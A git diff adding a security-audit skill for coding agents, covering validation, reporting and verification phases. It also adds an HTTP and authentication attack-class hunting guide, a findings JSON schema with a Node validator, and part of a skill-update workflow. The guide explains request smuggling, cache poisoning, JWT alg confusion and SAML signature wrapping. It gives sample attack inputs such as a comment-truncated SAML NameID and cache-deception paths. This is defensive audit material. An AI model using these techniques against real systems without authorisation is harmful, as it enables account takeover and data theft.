+3. Ask it to apply these tests (the adversarial, Phase 3 form of the canonical validation rules in [HUNTING.md](HUNTING.md) — here a separate agent tries to make each one fail):
+
+**Validation tests:**
+1. **Exploitation test**: Read the actual code at each step of the trace. Does the data flow work as claimed? Can you construct the exact input (HTTP request, CLI invocation, API call, crafted file, etc.) that triggers this?
+2. **Impact test**: What does the attacker actually get? If the answer is "they learn field names" or "they cause an error", that's not meaningful impact — not a finding on its own (at most a building block for a chain).
+3. **Baseline test**: Does the identified comparable have the same pattern? If yes, has it been exploited? If never exploited in years of production use, understand why before reporting.
+4. **Mitigation test**: Is there another layer that prevents exploitation? Check middleware, database constraints, framework defaults.
+5. **Parser/runtime behavior test**: If the exploit depends on how a parser or runtime handles specific input, verify against the actual spec or implementation — do not reason from intuition.
+
+Tell each validation agent:
+
+```
+Your job is to DISPROVE this finding. Read the actual source code at every step. If you cannot disprove it, confirm it with the exact code that makes it exploitable. Return one of:
+- "CONFIRMED: [explanation of why it's real, with code evidence]"
+- "REJECTED: [explanation of what the finding got wrong, with code evidence]"
+```
+
+**Kill false positives aggressively, but don't kill real findings.** A short report with 3 real findings is worth more than a long report with 30 theoretical ones. An honest "nothing found" is valid — but push hard before reaching that conclusion.
+
+### Phase 4: Report
+
+Write the report to the output directory established in Setup.
+
+**Output files:**
+
+1. `REPORT.md` -- Main report with:
+   - One-paragraph executive summary (honest assessment of security posture)
+   - Identified baseline and how this application compares
+   - Findings table (severity, title, one-line description)
+   - Each finding with: file path, concrete attack scenario, impact, recommended fix
+   - Hardening notes section (defense-in-depth suggestions, NOT findings)
+   - Positive patterns section (what the codebase does well -- this calibrates trust in the audit)
+
+2. `FINDINGS-DETAIL.md` -- For each finding rated MEDIUM or above:
+   - Complete data flow from input to sink with file:line references
+   - Exact HTTP request(s) to trigger
+   - What the attacker gets
+   - How the baseline comparable handles the same scenario
+
+Keep it short. If the report is longer than the codebase deserves, you're padding.
+
+### Phase 5: Structured output and schema check
+
+For every finding that survived Phase 3 validation, produce a structured JSON object conforming to the schema defined in `report-schema.json` (in the same directory as this skill file — read it via the Read tool before writing output). Write the result to `<output-dir>/findings.json`.
+
+The schema supports two verdict types via `oneOf`:
+- **`confirmed`** — a validated vulnerability with full trace, execution, and remediation
+- **`rejected`** — a finding that was investigated and determined to be factually incorrect
+
+**Before writing `findings.json`:**
+
+1. Read `report-schema.json` from this skill's directory. Follow it exactly — `additionalProperties: false` is enforced, so extra fields will make the output invalid.
+2. For each finding, populate every required field. If you cannot fill `trace` with real file paths and line numbers verified against the source, the finding is not sufficiently verified — go back and verify it or reject it. Mind the required fields that aren't self-evident: `intended_behavior` (what the code is *supposed* to do, so the defect is legible), `confidence` (`low`/`medium`/`high`, with a reason), and the `severity` object (`likelihood`/`impact`/`overall_severity`). All `severity` scores use the schema's **lowercase** enum — `informational`/`low`/`medium`/`high`/`critical`; the UPPERCASE tiers in SKILL.md and REPORT.md are prose labels, not valid JSON values.
+3. Run `node <skill-dir>/validate-findings.cjs <output-dir>/findings.json` to validate. It checks required fields, enum values, structural constraints, and `additionalProperties`. This is a structural check only — it confirms the JSON conforms to the schema, not that the findings are correct. Factual verification is Phase 6's job. Fix any failures before proceeding.
+
+### Phase 6: Independent verification
+
+The structured output from Phase 5 forces self-validation, but the same agent that wrote the finding also wrote the JSON — it won't catch its own blind spots. This phase uses a fresh agent to independently verify every claim in `findings.json`.
+
+Launch **one `research` agent per confirmed finding** via the Task tool, all in parallel. Each agent gets exactly one finding from `findings.json` and verifies it independently. Give each agent the JSON object for its finding and this prompt:
+
+```
+You are an independent verifier. You did NOT write this finding. Your job is to read the actual source code and verify that every factual claim is correct.
+
+1. Read the file and line number cited in EVERY trace step. Verify:
+   - The file exists at that path
+   - The line number matches the described code
+   - The scope (function name) is correct
+   - The description accurately reflects what the code does
+
+2. Verify the root_cause statement by reading the cited file and confirming the described defect exists.
+
+3. Verify the execution payloads would actually work, in terms that fit the target:
+   - Does the entry point exist as claimed — the endpoint/URL, CLI command, exported function, syscall/ioctl, message handler, or tool the attacker invokes?
+   - Does the invocation match — HTTP method, argument shape, call signature, or message format?
+   - Would the input survive validation and parsing on the real code path?
+   - Would the relevant authentication, authorization, or ownership check pass as described?
+
+4. Verify conditions are complete — are there prerequisites the finding missed?
+
+5. Check the remediation code_changes — would the fix actually prevent the attack without breaking normal functionality?
+
+6. Verify `intended_behavior` accurately states what the code should do, and that `confidence` matches the strength of the evidence — don't leave `high` on a claim you couldn't fully trace.
+
+Return one of:
+- "VERIFIED" — all claims checked out against the source
+- "CORRECTED: [field]: [what was wrong] → [what it should be]" — factual error in a specific field
+- "REJECTED: [reason]" — the finding is fundamentally wrong
+```
+
+Apply the agent's corrections:
+- **VERIFIED** findings: no changes needed
+- **CORRECTED** findings: update the specific fields in `findings.json`, re-run the schema validation script
+- **REJECTED** findings: change their `verdict` to `"rejected"` with the agent's reason, or remove them entirely
+
+After applying corrections, reconcile the prose deliverables: update `REPORT.md` and `FINDINGS-DETAIL.md` so they match the final `findings.json`. Remove or amend any finding the verification gate rejected or corrected — the human-readable report and the machine-readable output must not disagree.
+
+This is the final quality gate. Do not skip it.

--- a/.agents/skills/security-audit/WEB-PROTOCOL-AND-AUTH.md
+++ b/.agents/skills/security-audit/WEB-PROTOCOL-AND-AUTH.md
@@ -1,0 +1,85 @@
+# HTTP-Protocol and Authentication Hunting
+
+#### When to use this file
+
+Reach for this file when the target speaks HTTP at a layer where parsing, caching, or identity decisions happen: reverse proxies, CDNs, API gateways, load balancers, custom HTTP servers and parsers, and any app that builds responses or URLs from request metadata — and whenever it implements or consumes an auth protocol (sessions, JWTs, OAuth/OIDC, SAML, or password-reset flows). These are the classes `ATTACK-CLASSES.md` treats only in passing: the injection class covers *content*, but not the request/response framing or the identity-token machinery, which have their own specific, high-hit-rate bug patterns.
+
+Use alongside `ATTACK-CLASSES.md`. Access control there answers "is the check present and correct"; this file answers "can the attacker forge, replay, or confuse the identity the check runs on, or desync the request the check applies to."
+
+Pick the relevant classes based on Phase 1; split per subsystem (framing/proxy layer, token verification, session store) for large targets. A pure single-server app behind a managed CDN has little smuggling surface; a custom proxy or a service that trusts `X-Forwarded-*` has a lot.
+
+## Core discipline (include in every agent prompt for this domain)
+
+```
+- Framing bugs live in DISAGREEMENT, not in one parser. Request smuggling and cache poisoning exist because two components interpret the same bytes differently. Find the two components and the byte they disagree on; a single correct parser in isolation is not the finding.
+- A signature you don't verify is decoration. For every token (JWT, SAML, cookie), find the exact line that verifies the signature AND the claims that apply to that token type (for JWT/OIDC: exp, aud, iss, nonce) — and that the algorithm is pinned server-side, not read from the token header. "It's signed" means nothing if nothing checks the signature with the right key and algorithm.
+- Every use of Host, X-Forwarded-*, Forwarded, or a request-derived URL is a trust decision. Trace it to what it controls: a reset link, a cache key, a redirect, an access check.
+- Reflected input in a security-relevant response field (Set-Cookie, Location, cache key, an absolute URL sent to a victim) — trace it to a cross-user impact (poisoned cache entry, redirect or token sent to a victim, cookie set in another context) even when it isn't classic XSS.
+```
+
+## HTTP request-framing attack classes (subagent_type: `general`)
+
+**Request smuggling / desync**
+A discrepancy in how two components (front proxy vs back-end, or HTTP/2 front vs HTTP/1.1 back) resolve message length. Classic forms: CL.TE, TE.CL, TE.TE (obfuscated `Transfer-Encoding`), and H2 downgrade (H2.CL / H2.TE) where an HTTP/2 front-end forwards to an HTTP/1.1 back-end and the injected `Content-Length`/`Transfer-Encoding` or CRLF in a header value survives. Audit angle: any component that parses HTTP messages itself, forwards requests, or normalizes headers. Look for lenient length handling (accepting both CL and TE, tolerating whitespace/casing/duplicates in `Transfer-Encoding`), and CRLF-in-header-value passthrough on the HTTP/2→1.1 hop. The prize is a request prefix that gets glued onto the *next* user's request.
+
+**Web cache poisoning (unkeyed input)**
+An input influences the response but is not part of the cache key, so the attacker's response is stored and served to others. Find the cache key construction, then find every input that changes the response body/headers but is absent from that key — `X-Forwarded-Host`, `X-Forwarded-Scheme`, custom headers, cookies stripped from the key, or a query param the key normalizes away. Reflected unkeyed input that lands in the cached body (a poisoned script src, an `<base href>` from `X-Forwarded-Host`) is stored XSS against every cache consumer.
+
+**Cache deception**
+Path/extension confusion that makes a dynamic, per-user page get cached as if it were a static asset (`/account/profile.css`, `/api/me;.js`, path-parameter tricks). The back-end serves the user's private page; the cache stores it under a path the attacker can then request. Trace how the cache decides "is this cacheable" versus how the app routes the path — the gap is the bug.
+
+**Host-header and forwarded-header trust**
+`Host` / `X-Forwarded-Host` used to build absolute URLs, routing, or cache keys. The highest-impact sink is password-reset / verification link construction: attacker sets the header, the victim receives a link to the attacker's domain, clicks, and leaks the token. Also: authentication or routing decisions keyed on a spoofable forwarded header.
+
+**CRLF / response header injection**
+User input reflected into a response header (`Location`, `Set-Cookie`, custom headers) with unescaped CR/LF, letting the attacker inject headers or split the response. Trace user input into any header-setting call; confirm the framework doesn't already strip CR/LF (many do — verify first, see #5).
+
+## Authentication-protocol attack classes (subagent_type: `general`)
+
+First establish which role the target plays — it determines whose duty each control is. `redirect_uri` allowlisting, PKCE enforcement, authorization-code issuance, and assertion signing belong to the **authorization server / IdP**; a **relying-party client** legitimately sends its own `redirect_uri` and consumes tokens, so do not report "no `redirect_uri` allowlist" or "issues codes without PKCE" against a client. Token *verification* defects (below) apply to whichever side validates the token.
+
+**JWT verification defects**
+The densest source of auth bypasses. Check, in the verification code:
+- **`alg` confusion** — `alg: none` accepted, or RS256→HS256 where the server verifies an attacker-forged HS256 token using the *public* key as the HMAC secret. Find where the algorithm is chosen: is it taken from the token header (attacker-controlled) or pinned server-side?
+- **Decode without verify** — code that reads claims from a decoded token but never calls the verify function, or ignores its return/exception.
+- **Missing claim checks** — `exp` (expiry), `nbf`, `aud` (audience — token for service A replayed at service B), `iss` (issuer). A signature check without claim checks is half a check.
+- **Key-selection injection** — `kid`, `jku`, or `x5u` header taken from the token: `kid` used in a file path (traversal) or SQL (injection) to fetch the key, or `jku` pointing at an attacker-hosted JWK Set / `x5u` at an attacker-hosted X.509 cert chain. Attacker names the key that verifies their own forgery.
+- **Weak/shared secret** — HMAC secret that's a guessable string or shared across trust domains.
+
+**OAuth / OIDC flow defects**
+- **`redirect_uri` validation** — substring/prefix matching, open-redirect on an allowlisted host, or `redirect_uri` not bound to the client. Leaks the authorization code to the attacker.
+- **Missing/weak `state`** — no CSRF token on the callback → login CSRF / forced-login / session fixation of the OAuth flow. (`state` is a session-binding/CSRF control; authorization-code injection is prevented by PKCE and the OIDC `nonce`, not by `state` — don't conflate them.) Confirm `state` is generated, bound to the session, and verified on return.
+- **PKCE** — missing on public clients, or `code_verifier` not actually checked against `code_challenge`.
+- **`id_token` validation** — audience, issuer, signature, and `nonce` all verified? A token minted for another client accepted here is account takeover.
+- **Mix-up / IdP confusion** — multi-IdP flows where the response isn't bound to the IdP the request went to.
+
+**SAML assertion defects**
+- **Signature wrapping (XSW)** — a signed assertion plus an injected unsigned one; the verifier checks the signature on one element but reads identity from another. Find the gap between "what is signature-verified" and "what is read as the authenticated identity."
+- **Signature exclusion** — unsigned assertions accepted, or signature verification skippable via a flag/empty-signature path.
+- **XXE / DTD** in the XML parser processing assertions.
+- **Comment truncation** — a comment inserted into the signed NameID (`admin@company.com<!---->.attacker.com`) that canonicalization strips before the signature check (so it still validates) but that truncates identity extraction to the pre-comment text (`admin@company.com`, the victim). Same root as XSW: the bytes the signature covers ≠ the bytes read as identity.
+- **Missing replay / binding checks** — even with a valid signature, is the assertion bound and fresh? Check `NotBefore`/`NotOnOrAfter` (validity window), `Recipient`/`Audience` (assertion minted for *this* SP, not replayed from another), `InResponseTo` (bound to a real outstanding request — blocks unsolicited-response injection), and one-time-use (a replayed assertion rejected). The signature checks above prove the assertion wasn't forged; these prove it wasn't stolen and replayed.
+
+**Session-management defects**
+- **Fixation** — session identifier not rotated on privilege change (login, step-up auth). Attacker fixes a known ID, victim authenticates into it.
+- **Weak invalidation** — session/token still valid after logout, password change, or revocation; server-side state not cleared (especially stateless JWT sessions with no revocation list).
+- **Predictable identifiers** (non-CSPRNG session IDs an attacker can guess/derive), or an overly broad cookie `Domain` that leaks the session cookie to an attacker-controlled sibling subdomain. (Bare "cookie could be shorter-lived" with no leakage path is a hardening note, not a finding.)
+
+**Password-reset / account-recovery defects**
+- Token not cryptographically bound to the user (reset A's token, use it on B), predictable/short token, no single-use or expiry, token leaked via `Host` header (see above) or `Referer`, or a race that mints multiple valid tokens. Recovery flows are frequently the weakest path to the strongest impact (account takeover).
+
+## Universal moves (apply across the above)
+
+- **Diff duplicated request paths side by side.** Where the code has more than one thing that parses or forwards HTTP (a middleware plus the framework, a normalizer plus the router, a legacy API version plus the current one), read them together and feed each the same ambiguous bytes on paper. Divergence is the smuggling/desync bug.
+- **Walk the whole token lifecycle.** Issue → store → transmit → verify → refresh → revoke. The bugs live in the transitions the happy path skips: a session still valid after logout, a refresh that never re-checks revocation, a reset token that survives a password change.
+- **Enumerate every door to the same identity.** SSO, password login, API key, password reset, impersonation — each is a parallel path that mints a session. The weakest one sets the account's real security; a hardened login means nothing if reset is trivial.
+- **Audit the compat/fallback path.** A legacy endpoint version, a deprecated header, or a "for old clients" branch that skips a guard the main path added. Old auth code is where the reverted or forgotten check hides.
+
+## Validation rules (apply before reporting ANY finding here)
+
+1. **Source-visibility gate — this domain lives partly outside the repo.** Framing bugs (proxy chain), cache poisoning/deception (cache-key config), secret strength, and token entropy frequently depend on components, config, or values NOT in the audited tree. If confirming the bug requires a component/config/secret you cannot read, it is **unverifiable from source: flag it "requires deployment testing" and do NOT report it as a confirmed finding.** "Downgrade" is not enough — an unconfirmable HIGH reported as a MEDIUM is still a false positive.
+2. **For framing/cache findings, name both components and the divergent parse.** "The Go net/http back-end accepts a bare-LF `Transfer-Encoding` that the front proxy treats as CL" — not "smuggling may be possible." A single server with no proxy in front has no smuggling surface. If you've confirmed only the in-repo half (the back-end genuinely mishandles a specific ambiguous input — bare-LF `Transfer-Encoding`, duplicate CL), record it as a lead with the exact bytes — "requires paired front-end testing" — a real observation, not a severity-rated finding.
+3. **For token findings, cite the verification line and what it fails to check.** Point at the `verify`/`decode` call and the missing `alg` pin / `aud` check / signature step. A forged-token claim requires showing the server would accept the forgery, not just that JWTs are in use. Establish the client-vs-server role first — don't fault a client for controls the server owns.
+4. **Prove the cross-user impact.** Show the payload reaching a victim's response (cache), request (smuggling), session (fixation), or inbox (reset link). Attacker-only effects are not findings: a `Host` header reflected into a self-referential link the victim never receives out-of-band is a hardening note; a `Host` header controlling a reset link emailed to the victim is a finding.
+5. **Verify the framework AND the library default don't already handle it.** Many stacks strip CR/LF from headers, rotate sessions on login, and key caches on `Host` by default; JWT libraries increasingly reject `alg:none` and require an explicit algorithm list — check the library and version, and if you cannot determine the default, treat it as unverifiable rather than assuming it's vulnerable. Only report secret/RNG weakness when the code itself sets a hardcoded/short/derivable value or uses a non-CSPRNG. Confirm the specific defense is absent — do not report a gap the framework or library already closes.
+6. **Return ONLY confirmed findings** with the divergent parse or the skipped verification step and the cross-user impact — or "No exploitable protocol/auth issues found" if that's honest.

--- a/.agents/skills/security-audit/report-schema.json
+++ b/.agents/skills/security-audit/report-schema.json
@@ -1,0 +1,210 @@
+{
+  "$comment": "Single source of truth for findings.json structure (see SKILL.md Phase 5). validate-findings.cjs reads this file directly and interprets it — there is no second copy of these rules to keep in sync.",
+  "output_schema": {
+    "oneOf": [
+      {
+        "type": "object",
+        "description": "Confirmed vulnerability — provide the complete, independently verified report.",
+        "properties": {
+          "verdict": {
+            "type": "string",
+            "const": "confirmed"
+          },
+          "title": {
+            "type": "string",
+            "description": "A concise, standard title for the vulnerability."
+          },
+          "description": {
+            "type": "string",
+            "description": "Comprehensive explanation of the vulnerability. Include any reproduction details (proof-of-concept input, configuration, observed output or crash) here."
+          },
+          "root_cause": {
+            "type": "string",
+            "description": "One sentence using the template: '[function_or_component] in [file] does not [missing action], allowing [consequence]'. MUST include the function/component name and file name where the defect exists."
+          },
+          "intended_behavior": {
+            "type": "string",
+            "description": "What was the developer trying to build? Explain the intended, non-vulnerable business logic."
+          },
+          "trace": {
+            "type": "array",
+            "minItems": 2,
+            "items": {
+              "type": "object",
+              "properties": {
+                "kind": {
+                  "type": "string",
+                  "enum": ["entrypoint", "propagation", "sink"]
+                },
+                "file": {
+                  "type": "string",
+                  "description": "Exact file path relative to repository root."
+                },
+                "line": {
+                  "type": "integer"
+                },
+                "scope": {
+                  "type": "string",
+                  "description": "Bare function or method name. No parentheses, no arguments."
+                },
+                "description": {
+                  "type": "string",
+                  "description": "Factual description of the state change or data movement."
+                }
+              },
+              "required": ["kind", "file", "line", "scope", "description"],
+              "additionalProperties": false
+            },
+            "description": "Sequential code trace from entrypoint to sink, verified against actual source code. The first step must be kind 'entrypoint', the last must be kind 'sink', and any intermediate steps must be kind 'propagation' (enforced by the validator)."
+          },
+          "conditions": {
+            "type": "array",
+            "items": {
+              "type": "object",
+              "properties": {
+                "kind": {
+                  "type": "string",
+                  "enum": ["authentication_level", "authorization_role", "user_interaction", "system_configuration", "network_routing", "environmental_dependency", "data_state", "timing_dependency", "third_party_dependency"]
+                },
+                "description": {
+                  "type": "string"
+                }
+              },
+              "required": ["kind", "description"],
+              "additionalProperties": false
+            },
+            "description": "Factual prerequisites for exploitation. Empty array if exploitable by default."
+          },
+          "execution": {
+            "type": "object",
+            "properties": {
+              "attacker_perspective": {
+                "type": "string",
+                "description": "Who is the attacker and their starting point."
+              },
+              "payloads": {
+                "type": "array",
+                "items": {
+                  "type": "string"
+                },
+                "description": "Specific malicious inputs, HTTP requests, or scripts."
+              },
+              "instructions": {
+                "type": "array",
+                "items": {
+                  "type": "string"
+                },
+                "description": "Linear array of all attacker actions from setup through exploitation."
+              },
+              "expected_result": {
+                "type": "string",
+                "description": "Observable outcome confirming successful exploitation."
+              }
+            },
+            "required": ["attacker_perspective", "payloads", "instructions", "expected_result"],
+            "additionalProperties": false
+          },
+          "remediation": {
+            "type": "object",
+            "properties": {
+              "strategy": {
+                "type": "string",
+                "description": "High-level explanation of the fix."
+              },
+              "code_changes": {
+                "type": "array",
+                "items": {
+                  "type": "object",
+                  "properties": {
+                    "file_name": {
+                      "type": "string"
+                    },
+                    "fixed_code": {
+                      "type": "string"
+                    }
+                  },
+                  "required": ["file_name", "fixed_code"],
+                  "additionalProperties": false
+                }
+              }
+            },
+            "required": ["strategy"],
+            "additionalProperties": false
+          },
+          "severity": {
+            "type": "object",
+            "properties": {
+              "likelihood": {
+                "type": "object",
+                "properties": {
+                  "score": {
+                    "type": "string",
+                    "enum": ["informational", "low", "medium", "high", "critical"]
+                  },
+                  "reason": {
+                    "type": "string"
+                  }
+                },
+                "required": ["score", "reason"],
+                "additionalProperties": false
+              },
+              "impact": {
+                "type": "object",
+                "properties": {
+                  "score": {
+                    "type": "string",
+                    "enum": ["informational", "low", "medium", "high", "critical"]
+                  },
+                  "reason": {
+                    "type": "string"
+                  }
+                },
+                "required": ["score", "reason"],
+                "additionalProperties": false
+              },
+              "overall_severity": {
+                "type": "string",
+                "enum": ["informational", "low", "medium", "high", "critical"]
+              }
+            },
+            "required": ["likelihood", "impact", "overall_severity"],
+            "additionalProperties": false
+          },
+          "confidence": {
+            "type": "object",
+            "properties": {
+              "score": {
+                "type": "string",
+                "enum": ["low", "medium", "high"]
+              },
+              "reason": {
+                "type": "string",
+                "description": "Why you scored the confidence this way. Mention any missing files, complex routing, or ambiguous data flows."
+              }
+            },
+            "required": ["score", "reason"],
+            "additionalProperties": false
+          }
+        },
+        "required": ["verdict", "title", "description", "root_cause", "intended_behavior", "trace", "conditions", "execution", "remediation", "severity", "confidence"],
+        "additionalProperties": false
+      },
+      {
+        "type": "object",
+        "description": "Rejected finding — the described behavior is factually incorrect or the code path does not exist.",
+        "properties": {
+          "verdict": {
+            "type": "string",
+            "const": "rejected"
+          },
+          "reason": {
+            "type": "string",
+            "description": "Explain which specific claims in the finding are factually wrong (e.g., code path doesn't exist, mitigation prevents the described flow, trace is incorrect)."
+          }
+        },
+        "required": ["verdict", "reason"],
+        "additionalProperties": false
+      }
+    ]
+  }
+}

--- a/.agents/skills/security-audit/validate-findings.cjs
+++ b/.agents/skills/security-audit/validate-findings.cjs
@@ -1,0 +1,201 @@
+#!/usr/bin/env node
+
+/**
+ * Validates findings.json against report-schema.json.
+ * Usage: node validate-findings.cjs <path-to-findings.json>
+ *
+ * The validation rules live in report-schema.json — the single source of truth.
+ * This script reads that schema at runtime and interprets the subset of JSON
+ * Schema it uses: type (object|array|string|integer), properties, required,
+ * additionalProperties:false, enum, const, items, minItems, and oneOf.
+ *
+ * Some constraints can't be expressed in that subset (a confirmed trace must
+ * start at an "entrypoint", end at a "sink", and only use "propagation" for
+ * intermediate steps). They're applied as an explicit, clearly-labelled
+ * semantic layer after schema validation.
+ *
+ * Zero dependencies. Exits 0 on success, 1 on validation failure.
+ */
+
+const fs = require("fs");
+const path = require("path");
+
+const file = process.argv[2];
+if (!file) {
+	console.error("Usage: node validate-findings.cjs <path-to-findings.json>");
+	process.exit(1);
+}
+
+const schemaPath = path.join(__dirname, "report-schema.json");
+let itemSchema;
+try {
+	const doc = JSON.parse(fs.readFileSync(schemaPath, "utf8"));
+	itemSchema = doc.output_schema;
+	if (!itemSchema) throw new Error('report-schema.json is missing top-level "output_schema"');
+} catch (e) {
+	console.error(`Failed to load schema from ${schemaPath}:`, e.message);
+	process.exit(1);
+}
+
+let findings;
+try {
+	findings = JSON.parse(fs.readFileSync(file, "utf8"));
+} catch (e) {
+	console.error("Failed to parse JSON:", e.message);
+	process.exit(1);
+}
+
+if (!Array.isArray(findings)) {
+	console.error("findings.json must be an array");
+	process.exit(1);
+}
+
+// --- Generic JSON Schema interpreter (the subset used by report-schema.json) ---
+
+function typeOf(v) {
+	if (Array.isArray(v)) return "array";
+	if (v === null) return "null";
+	return typeof v; // "object" | "string" | "number" | "boolean"
+}
+
+// For oneOf: find a property defined with a `const` so error messages can point
+// at the intended branch (e.g. discriminate confirmed vs rejected by "verdict").
+function findDiscriminator(schema) {
+	if (!schema.properties) return null;
+	for (const [key, sub] of Object.entries(schema.properties)) {
+		if (sub && Object.prototype.hasOwnProperty.call(sub, "const")) {
+			return { key, value: sub.const };
+		}
+	}
+	return null;
+}
+
+function validate(value, schema, p, errors) {
+	if (schema.oneOf) {
+		// Prefer the branch whose const discriminator matches, so the caller sees
+		// detailed errors for the branch they clearly intended.
+		for (const branch of schema.oneOf) {
+			const disc = findDiscriminator(branch);
+			if (disc && value && typeof value === "object" && value[disc.key] === disc.value) {
+				validate(value, branch, p, errors);
+				return;
+			}
+		}
+		// No discriminator matched. If every branch is discriminated by the same
+		// key, report the bad discriminator value clearly.
+		const discs = schema.oneOf.map(findDiscriminator).filter(Boolean);
+		if (discs.length === schema.oneOf.length && value && typeof value === "object") {
+			const key = discs[0].key;
+			const allowed = discs.map((d) => JSON.stringify(d.value)).join(", ");
+			errors.push(`${p}: "${key}" must be one of ${allowed}, got ${JSON.stringify(value[key])}`);
+			return;
+		}
+		const passing = schema.oneOf.filter((b) => collect(value, b, p).length === 0);
+		if (passing.length !== 1) {
+			errors.push(`${p}: does not match exactly one of the allowed schemas`);
+		}
+		return;
+	}
+
+	if (Object.prototype.hasOwnProperty.call(schema, "const") && value !== schema.const) {
+		errors.push(`${p}: must equal ${JSON.stringify(schema.const)}, got ${JSON.stringify(value)}`);
+	}
+
+	if (schema.enum && !schema.enum.includes(value)) {
+		const allowed = schema.enum.map((v) => JSON.stringify(v)).join(", ");
+		errors.push(`${p}: invalid value ${JSON.stringify(value)} (expected one of ${allowed})`);
+	}
+
+	switch (schema.type) {
+		case "object": {
+			if (typeOf(value) !== "object") {
+				errors.push(`${p}: expected object, got ${typeOf(value)}`);
+				return;
+			}
+			for (const req of schema.required || []) {
+				if (!(req in value)) errors.push(`${p}: missing required field "${req}"`);
+			}
+			for (const key of Object.keys(value)) {
+				if (schema.properties && key in schema.properties) {
+					validate(value[key], schema.properties[key], `${p}.${key}`, errors);
+				} else if (schema.additionalProperties === false) {
+					errors.push(`${p}: unexpected field "${key}"`);
+				}
+			}
+			break;
+		}
+		case "array": {
+			if (typeOf(value) !== "array") {
+				errors.push(`${p}: expected array, got ${typeOf(value)}`);
+				return;
+			}
+			if (typeof schema.minItems === "number" && value.length < schema.minItems) {
+				errors.push(`${p}: must have at least ${schema.minItems} item(s), got ${value.length}`);
+			}
+			if (schema.items) {
+				value.forEach((el, i) => validate(el, schema.items, `${p}[${i}]`, errors));
+			}
+			break;
+		}
+		case "integer": {
+			if (typeOf(value) !== "number" || !Number.isInteger(value)) {
+				errors.push(`${p}: expected integer, got ${typeOf(value)}`);
+			}
+			break;
+		}
+		case "string": {
+			if (typeOf(value) !== "string") {
+				errors.push(`${p}: expected string, got ${typeOf(value)}`);
+			}
+			break;
+		}
+		default:
+			break; // no type constraint at this node
+	}
+}
+
+function collect(value, schema, p) {
+	const errors = [];
+	validate(value, schema, p, errors);
+	return errors;
+}
+
+// --- Run ----------------------------------------------------------------------
+
+let errorCount = 0;
+
+findings.forEach((f, i) => {
+	const label = `[${i}] ${(f && (f.title || f.reason)) || "(untitled)"}`;
+	console.log(`Checking ${label}`);
+
+	const errs = collect(f, itemSchema, `[${i}]`);
+
+	// Semantic layer — constraints the schema subset can't express:
+	// a confirmed trace must be one entrypoint, zero or more propagation steps,
+	// then one sink.
+	if (f && f.verdict === "confirmed" && Array.isArray(f.trace) && f.trace.length > 0) {
+		if (f.trace[0] && f.trace[0].kind !== "entrypoint") {
+			errs.push(`[${i}].trace[0].kind must be "entrypoint", got ${JSON.stringify(f.trace[0].kind)}`);
+		}
+		const last = f.trace.length - 1;
+		if (f.trace[last] && f.trace[last].kind !== "sink") {
+			errs.push(`[${i}].trace[${last}].kind must be "sink", got ${JSON.stringify(f.trace[last].kind)}`);
+		}
+		for (let j = 1; j < last; j++) {
+			if (f.trace[j] && f.trace[j].kind !== "propagation") {
+				errs.push(`[${i}].trace[${j}].kind must be "propagation", got ${JSON.stringify(f.trace[j].kind)}`);
+			}
+		}
+	}
+
+	for (const msg of errs) console.error("  ERROR:", msg);
+	errorCount += errs.length;
+});
+
+console.log();
+if (errorCount === 0) {
+	console.log(`PASS: ${findings.length} findings valid`);
+} else {
+	console.error(`FAIL: ${errorCount} error(s) across ${findings.length} findings`);
+	process.exit(1);
+}

--- a/.claude/skills/blueprint-provisioning
+++ b/.claude/skills/blueprint-provisioning
@@ -1,0 +1,1 @@
+../../.agents/skills/blueprint-provisioning

--- a/.claude/skills/e2e-playwright
+++ b/.claude/skills/e2e-playwright
@@ -1,0 +1,1 @@
+../../.agents/skills/e2e-playwright

--- a/.claude/skills/github-actions-hardening
+++ b/.claude/skills/github-actions-hardening
@@ -1,0 +1,1 @@
+../../.agents/skills/github-actions-hardening

--- a/.claude/skills/moodle-internals
+++ b/.claude/skills/moodle-internals
@@ -1,0 +1,1 @@
+../../.agents/skills/moodle-internals

--- a/.claude/skills/playwright-cli
+++ b/.claude/skills/playwright-cli
@@ -1,0 +1,1 @@
+../../.agents/skills/playwright-cli

--- a/.claude/skills/security-audit
+++ b/.claude/skills/security-audit
@@ -1,0 +1,1 @@
+../../.agents/skills/security-audit

--- a/.claude/skills/unit-testing
+++ b/.claude/skills/unit-testing
@@ -1,0 +1,1 @@
+../../.agents/skills/unit-testing

--- a/.claude/skills/wasm-browser-runtime
+++ b/.claude/skills/wasm-browser-runtime
@@ -1,0 +1,1 @@
+../../.agents/skills/wasm-browser-runtime

--- a/.claude/skills/wp-playground-php-wasm
+++ b/.claude/skills/wp-playground-php-wasm
@@ -1,0 +1,1 @@
+../../.agents/skills/wp-playground-php-wasm

--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -152,6 +152,8 @@ jobs:
           rsync -a ./ ./_site/ \
             --exclude ".git/" \
             --exclude ".github/" \
+            --exclude ".agents/" \
+            --exclude ".claude/" \
             --exclude ".venv/" \
             --exclude ".cache/" \
             --exclude "_site/" \

--- a/.github/workflows/update-agent-skills.yml
+++ b/.github/workflows/update-agent-skills.yml
@@ -1,0 +1,65 @@
+# Update agent skills
+#
+# The third-party agent skills vendored under .agents/skills/ (see the Skills
+# section in AGENTS.md) are installed with the GitHub CLI (`gh skill add`),
+# which records the upstream repository, path and tree SHA of each one in its
+# SKILL.md frontmatter. This workflow runs `gh skill update --all` against that
+# directory once a week and opens a pull request when any vendored skill
+# changed, so the copies never drift silently from upstream. In-house skills
+# carry no github-* metadata and are skipped by the CLI with a notice.
+#
+# Pull requests opened with the default GITHUB_TOKEN do not trigger ci.yml.
+# That is fine here: skills are instructions for coding agents, nothing in the
+# build or tests reads them. Review the diff (an upstream change is a behaviour
+# change for the agents) and merge.
+name: Update agent skills
+
+on:
+  schedule:
+    # Weekly, Mondays at 06:23 UTC. Offset from the other Monday schedules.
+    - cron: "23 6 * * 1"
+  workflow_dispatch:
+
+# Least privilege: the default token gets nothing; the job requests exactly
+# what pushing the update branch and opening the PR needs. The two third-party
+# actions are pinned to commit SHAs (Dependabot keeps the pins and the version
+# comments current); first-party actions/* stay on major tags like the rest of
+# the workflows here.
+permissions: {}
+
+concurrency:
+  group: update-agent-skills
+  cancel-in-progress: false
+
+jobs:
+  update:
+    runs-on: ubuntu-latest
+    timeout-minutes: 10
+    permissions:
+      contents: write
+      pull-requests: write
+    steps:
+      - uses: actions/checkout@v7
+
+      - id: update
+        uses: devantler-tech/actions/update-agent-skills@3ee6cb9bbd616c2a38779be41a5e41f3e77282d0 # v13.2.3
+        with:
+          dir: .agents/skills
+
+      - name: Open pull request
+        if: steps.update.outputs.changed == 'true'
